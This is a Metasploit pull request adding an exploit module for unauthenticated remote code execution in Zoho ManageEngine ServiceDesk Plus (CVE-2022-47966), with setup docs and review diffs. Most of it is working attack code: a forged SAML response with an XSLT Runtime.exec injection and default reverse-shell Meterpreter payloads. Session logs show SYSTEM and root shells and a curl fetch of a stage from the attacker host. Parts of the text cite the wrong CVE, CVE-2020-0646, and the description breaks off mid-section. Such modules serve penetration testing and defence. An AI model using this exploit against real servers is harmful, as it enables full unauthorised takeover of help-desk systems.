### PR TITLE
ManageEngine ServiceDesk Plus RCE (CVE-2022-47966)

### DIFF
--- a/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
+++ b/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
@@ -2,7 +2,7 @@
 
 This exploits an unauthenticated remote code execution vulnerability that
 affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below
-(CVE-2020-0646). Due to a dependency to an outdated library (Apache Santuario
+(CVE-2022-47966). Due to a dependency to an outdated library (Apache Santuario
 version 1.4.1), it is possible to execute arbitrary code by providing a crafted
 `samlResponse` XML to the ServiceDesk Plus SAML endpoint. Note that the target
 is only vulnerable if it has been configured with SAML-based SSO at least once

--- a/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
+++ b/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
@@ -49,7 +49,7 @@ have access to all the versions and platform installers.
 1. Start the server running `run.sh`
 
 ### Enable SAML 2.0 SSO
-1, Go to `http://localhost:8080`
+1. Go to `http://localhost:8080`
 1. Select `Log in as` `Administrator`.
 1. Go to `http://localhost:8080/app#/admin` and click on `SAML Single Sign On`
    in the `​​Users & Permission` section.

--- a/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
+++ b/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md
@@ -1,0 +1,192 @@
+## Vulnerable Application
+
+This exploits an unauthenticated remote code execution vulnerability that
+affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below
+(CVE-2020-0646). Due to a dependency to an outdated library (Apache Santuario
+version 1.4.1), it is possible to execute arbitrary code by providing a crafted
+`samlResponse` XML to the ServiceDesk Plus SAML endpoint. Note that the target
+is only vulnerable if it has been configured with SAML-based SSO at least once
+in the past, regardless of the current SAML-based SSO status.
+
+
+## Installation
+
+### SAML 2.0 Identity Provider
+If you don't have an already SAML 2.0 Identity Provider (IdP), you can use this
+free one for testing: https://mocksaml.com/
+
+Save the certificate to a local file (e.g. `cert.cer`) and take note of the SSO
+URL (`https://mocksaml.com/api/saml/sso`).
+
+### Download the installers
+Go to https://archives.manageengine.com/, fill the form with any data and
+select ServiceDesk Plus product with any version (e.g. `14003`). You can then
+have access to all the versions and platform installers.
+
+### Windows
+1. Launch the Windows installer and select all the default options by clicking
+   `Next` (you can skip the Registration for Technical Support part, it is
+   optional). When the installation is done, select `Start ServiceDesk Server`
+   and click `Finish`
+1. Go to `C:\Program Files\ManageEngine\ServiceDesk\bin\` and run `SDPLaunch`.
+   This will start a browser and get you to the login page.
+
+### Linux (Ubuntu)
+1. Make the installer executable executing `chmod +x <linux_installer>.bin`
+1. Launch the Linux installer as root, select all the default options by
+   clicking `Next` until you reach the installation path page.
+1. Change the installation path to somewhere else than under `/root/` (it
+   doesn't work with this default path) and finish the installation. You might
+   get an error 'Problem in initializing Postgres', just ignore it, click `OK`
+   and finish the installation. We'll fix this in the next step.
+1. If you got the `Postgres` error in the last step, go to the installation
+   base path (e.g. '/opt/ManageEngine/ServiceDesk/') and run the following
+   commands as root:
+    - `cp tools/postgres/bin/gettimezone tools/postgres/bin/gettimezone_32`
+    - `cp tools/postgres/bin/gettimezone_64 tools/postgres/bin/gettimezone`
+    - `cd bin`
+    - `./initPgsql.sh`
+1. Start the server running `run.sh`
+
+### Enable SAML 2.0 SSO
+1, Go to `http://localhost:8080`
+1. Select `Log in as` `Administrator`.
+1. Go to `http://localhost:8080/app#/admin` and click on `SAML Single Sign On`
+   in the `​​Users & Permission` section.
+1. In `Configure Identity Provider Details`, set the SSO URL from the IdP (e.g.
+   `https://mocksaml.com/api/saml/sso`), set the `Name ID Format` to
+   `Unspecified`, the `Algorithm` to `RSA_SHA1` and select the SiP certificate
+   file (e.g. `cert.cer`).
+1. In `Additional Claims` > `Default Fields`, set the `Login Name` to any
+   value.
+1. Click `Save`
+1. Enable SSO by switching the `Enable SAML Single Sign-On ?` button on the top
+   of the page.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966`
+1. Do: `exploit rhosts=<remote host IP> lhost=<local host IP>`
+1. You should get a shell
+1. Also test with other targets against Windows and Linux
+
+
+## Options
+
+### TARGETURI
+The ServiceDesk Plus SAML endpoint URL. Set to `/SamlResponseServlet` by default.
+
+### DELAY
+This sets the number of seconds to wait between each request. It is
+particularly useful when using a big payload with the `cmdstager` (Target 0),
+which requires sending multiple requests to the target. ServiceDesk Plus has an
+anti-DoS mechanism that blocks the source IP address if requests are sent too
+fast. This option is set to 5 seconds by default, which seems to be a safe
+value.
+
+
+## Scenarios
+
+### ServiceDesk Plus versions 14003 on Windows - Target 1 (`Windows Command`)
+```
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (175686 bytes) to 192.168.100.104
+[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.104:51417) at 2023-01-26 12:07:43 +0100
+
+meterpreter > sysinfo
+Computer        : DESKTOP-26CQRHP
+OS              : Windows 10 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+### ServiceDesk Plus versions 14003 on Windows - Target 0 (`Windows EXE Dropper`)
+```
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
+target => 0
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (200774 bytes) to 192.168.100.104
+[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.104:51435) at 2023-01-26 12:08:42 +0100
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+
+meterpreter > sysinfo
+Computer        : DESKTOP-26CQRHP
+OS              : Windows 10 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+### ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (`Unix Command`)
+```
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
+target => 2
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (24380 bytes) to 192.168.100.109
+[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.109:43062) at 2023-01-26 16:07:21 +0100
+
+meterpreter > sysinfo
+Computer        : ubuntu
+OS              : Linux 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: root
+```
+
+### ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (`Unix Dropper`)
+```
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
+target => 3
+msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
+
+[*] Started reverse TCP handler on 192.168.100.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://192.168.100.1:8080/55oyjyc1i
+[*] Client 192.168.100.109 (curl/7.68.0) requested /55oyjyc1i
+[*] Sending payload to 192.168.100.109 (curl/7.68.0)
+[*] Sending stage (3045348 bytes) to 192.168.100.109
+[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:40138) at 2023-01-26 16:09:37 +0100
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.109
+OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```
+

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -15,8 +15,14 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'ManageEngine ServiceDesk Plus Unauthenticated SAML RCE',
         'Description' => %q{
-          This module exploits an unauthenticated remote code execution
-          vulnerability that affects Zoho ManageEngine ServiceDesk Plus.
+          This exploits an unauthenticated remote code execution vulnerability
+          that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and
+          below (CVE-2020-0646). Due to a dependency to an outdated library
+          (Apache Santuario version 1.4.1), it is possible to execute arbitrary
+          code by providing a crafted `samlResponse` XML to the ServiceDesk Plus
+          SAML endpoint. Note that the target is only vulnerable if it has been
+          configured with SAML-based SSO at least once in the past, regardless of
+          the current SAML-based SSO status.
         },
         'Author' => [
           'Khoa Dinh', # Original research
@@ -28,11 +34,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-0646'],
           ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
           ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
-          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966']
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
+          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
         ],
         'Platform' => ['win', 'unix', 'linux'],
         'Payload' => {
-          'BadChars' => "'"
+          'BadChars' => "\x27\x20"
         },
         'Targets' => [
           [
@@ -58,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' }
             }
           ],
           [
@@ -66,13 +74,14 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
+              'CmdStagerFlavor' => %w[curl wget echo lwprequest]
             }
           ]
         ],
         'DefaultOptions' => {
-          'RPORT' => 443,
-          'SSL' => true
+          'RPORT' => 8080
         },
         'DefaultTarget' => 1,
         'DisclosureDate' => '2023-01-10',
@@ -132,8 +141,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    if target['Type'] == :windows_dropper
+    case target['Type']
+    when :windows_dropper
       cmd = "cmd /c #{cmd}"
+    when :unix_cmd, :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' } if target['Type'] == :linux_dropper
+      cmd = "bash -c #{cmd}"
     end
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This exploits an unauthenticated remote code execution vulnerability
           that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and
-          below (CVE-2020-0646). Due to a dependency to an outdated library
+          below (CVE-2022-47966). Due to a dependency to an outdated library
           (Apache Santuario version 1.4.1), it is possible to execute arbitrary
           code by providing a crafted `samlResponse` XML to the ServiceDesk Plus
           SAML endpoint. Note that the target is only vulnerable if it has been
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'References' => [
-          ['CVE', '2020-0646'],
+          ['CVE', '2022-47966'],
           ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
           ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
           ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => ['win', 'unix', 'linux'],
         'Payload' => {
-          'BadChars' => "\x27\x20"
+          'BadChars' => "\x27"
         },
         'Targets' => [
           [
@@ -145,28 +145,36 @@ class MetasploitModule < Msf::Exploit::Remote
     when :windows_dropper
       cmd = "cmd /c #{cmd}"
     when :unix_cmd, :linux_dropper
-      cmd = cmd.gsub(' ') { '${IFS}' } if target['Type'] == :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' }
       cmd = "bash -c #{cmd}"
     end
     cmd = cmd.encode(xml: :attr).gsub('"', '')
 
+    assertion_id = "_#{SecureRandom.uuid}"
+    # Randomize variable names and make sure they are all different using a Set
+    vars = Set.new
+    loop do
+      vars << Rex::Text.rand_text_alpha_lower(5..8)
+      break unless vars.size < 3
+    end
+    vars = vars.to_a
     saml = <<~EOS
       <?xml version="1.0" encoding="UTF-8"?>
       <samlp:Response
-        ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"
-        InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"
-        IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+        ID="_#{SecureRandom.uuid}"
+        InResponseTo="_#{Rex::Text.rand_text_hex(32)}"
+        IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
         <samlp:Status>
           <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
         </samlp:Status>
-        <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"
-          IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+        <Assertion ID="#{assertion_id}"
+          IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
           <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
           <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
             <ds:SignedInfo>
               <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
               <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
-              <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600">
+              <ds:Reference URI="##{assertion_id}">
                 <ds:Transforms>
                   <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                   <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
@@ -174,19 +182,19 @@ class MetasploitModule < Msf::Exploit::Remote
                       xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
                       xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
                       <xsl:template match="/">
-                        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
-                        <xsl:variable name="process" select="rt:exec($rtobject,'#{cmd}')"/>
-                        <xsl:variable name="processString" select="ob:toString($process)"/>
-                        <xsl:value-of select="$processString"/>
+                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
+                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
+                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
+                        <xsl:value-of select="$#{vars[2]}"/>
                       </xsl:template>
                     </xsl:stylesheet>
                   </ds:Transform>
                 </ds:Transforms>
                 <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
-                <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue>
+                <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
               </ds:Reference>
             </ds:SignedInfo>
-            <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue>
+            <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue>
             <ds:KeyInfo/>
           </ds:Signature>
         </Assertion>

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -116,7 +116,11 @@ class MetasploitModule < Msf::Exploit::Remote
     unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus'
       return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")
     end
-    unless Rex::Version.new(info[:build]) <= Rex::Version.new('14003')
+
+    # SAML 2.0 support has been added in build 10511
+    # see https://www.manageengine.com/products/service-desk/on-premises/readme.html#readme105
+    build = Rex::Version.new(info[:build])
+    unless build >= Rex::Version.new('10511') && build <= Rex::Version.new('14003')
       return CheckCode::Safe("Target build is #{info[:build]}")
     end
 

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -1,0 +1,203 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ServiceDesk Plus Unauthenticated SAML RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution
+          vulnerability that affects Zoho ManageEngine ServiceDesk Plus.
+        },
+        'Author' => [
+          'Khoa Dinh', # Original research
+          'horizon3ai', # PoC
+          'Christophe De La Fuente' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-0646'],
+          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
+          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966']
+        ],
+        'Platform' => ['win', 'unix', 'linux'],
+        'Payload' => {
+          'BadChars' => "'"
+        },
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2023-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
+      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    )
+    return CheckCode::Unknown unless res
+
+    # vulnerable servers respond with 400 and a HTML body
+    return CheckCode::Safe unless res.code == 400
+
+    script = res.get_html_document.xpath('//script[contains(text(), "BUILD_NUMBER")]')
+    info = script.text.match(/PRODUCT_NAME\\x22\\x3A\\x22(?<product>.+?)\\x22,.*BUILD_NUMBER\\x22\\x3A\\x22(?<build>[0-9]+?)\\x22,/)
+    return CheckCode::Unknown unless info
+    unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus'
+      return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")
+    end
+    unless Rex::Version.new(info[:build]) <= Rex::Version.new('14003')
+      return CheckCode::Safe("Target build is #{info[:build]}")
+    end
+
+    CheckCode::Appears
+  end
+
+  def encode_begin(real_payload, reqs)
+    super
+
+    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
+      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command, :unix_cmd
+      execute_command(payload.encoded)
+    when :windows_dropper, :linux_dropper
+      execute_cmdstager(delay: datastore['DELAY'])
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    if target['Type'] == :windows_dropper
+      cmd = "cmd /c #{cmd}"
+    end
+    cmd = cmd.encode(xml: :attr).gsub('"', '')
+
+    saml = <<~EOS
+      <?xml version="1.0" encoding="UTF-8"?>
+      <samlp:Response
+        ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"
+        InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"
+        IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+        <samlp:Status>
+          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+        </samlp:Status>
+        <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"
+          IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
+          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+            <ds:SignedInfo>
+              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
+              <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600">
+                <ds:Transforms>
+                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+                    <xsl:stylesheet version="1.0"
+                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                      <xsl:template match="/">
+                        <xsl:variable name="rtobject" select="rt:getRuntime()"/>
+                        <xsl:variable name="process" select="rt:exec($rtobject,'#{cmd}')"/>
+                        <xsl:variable name="processString" select="ob:toString($process)"/>
+                        <xsl:value-of select="$processString"/>
+                      </xsl:template>
+                    </xsl:stylesheet>
+                  </ds:Transform>
+                </ds:Transforms>
+                <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
+                <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue>
+              </ds:Reference>
+            </ds:SignedInfo>
+            <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue>
+            <ds:KeyInfo/>
+          </ds:Signature>
+        </Assertion>
+      </samlp:Response>
+    EOS
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'vars_post' => {
+        'SAMLResponse' => Rex::Text.encode_base64(saml)
+      }
+    })
+
+    unless res&.code == 500
+      lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
+      unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
+        elog("Unkown error returned:\n#{lines.join("\n")}")
+        fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.")
+      end
+      fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')
+    end
+
+    res
+  end
+
+end


### PR DESCRIPTION
This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2020-0646). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted `samlResponse` XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.


## Installation

### SAML 2.0 Identity Provider
If you don't have an already SAML 2.0 Identity Provider (IdP), you can use this free one for testing: https://mocksaml.com/

Save the certificate to a local file (e.g. `cert.cer`) and take note of the SSO URL (`https://mocksaml.com/api/saml/sso`).

### Download the installers
Go to https://archives.manageengine.com/, fill the form with any data and select ServiceDesk Plus product with any version (e.g. `14003`). You can then have access to all the versions and platform installers.

### Windows
1. Launch the Windows installer and select all the default options by clicking `Next` (you can skip the Registration for Technical Support part, it is optional). When the installation is done, select `Start ServiceDesk Server` and click `Finish`
1. Go to `C:\Program Files\ManageEngine\ServiceDesk\bin\` and run `SDPLaunch`. This will start a browser and get you to the login page.

### Linux (Ubuntu)
1. Make the installer executable executing `chmod +x <linux_installer>.bin`
1. Launch the Linux installer as root, select all the default options by clicking `Next` until you reach the installation path page.
1. Change the installation path to somewhere else than under `/root/` (it doesn't work with this default path) and finish the installation. You might get an error 'Problem in initializing Postgres', just ignore it, click `OK` and finish the installation. We'll fix this in the next step.
1. If you got the `Postgres` error in the last step, go to the installation base path (e.g. '/opt/ManageEngine/ServiceDesk/') and run the following commands as root:
    - `cp tools/postgres/bin/gettimezone tools/postgres/bin/gettimezone_32`
    - `cp tools/postgres/bin/gettimezone_64 tools/postgres/bin/gettimezone`
    - `cd bin`
    - `./initPgsql.sh`
1. Start the server running `run.sh` as root

### Enable SAML 2.0 SSO
1, Go to `http://localhost:8080`
1. Select `Log in as` `Administrator`.
1. Go to `http://localhost:8080/app#/admin` and click on `SAML Single Sign On` in the `​​Users & Permission` section.
1. In `Configure Identity Provider Details`, set the SSO URL from the IdP (e.g. `https://mocksaml.com/api/saml/sso`), set the `Name ID Format` to `Unspecified`, the `Algorithm` to `RSA_SHA1` and select the SiP certificate file (e.g. `cert.cer`).
1. In `Additional Claims` > `Default Fields`, set the `Login Name` to any value.
1. Click `Save`
1. Enable SSO by switching the `Enable SAML Single Sign-On ?` button on the top of the page.


## Verification Steps

1. Start msfconsole
1. Do: `use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966`
1. Do: `exploit rhosts=<remote host IP> lhost=<local host IP>`
1. You should get a shell
1. Also test with other targets against Windows and Linux

## Scenarios

### ServiceDesk Plus versions 14003 on Windows - Target 1 (`Windows Command`)
```
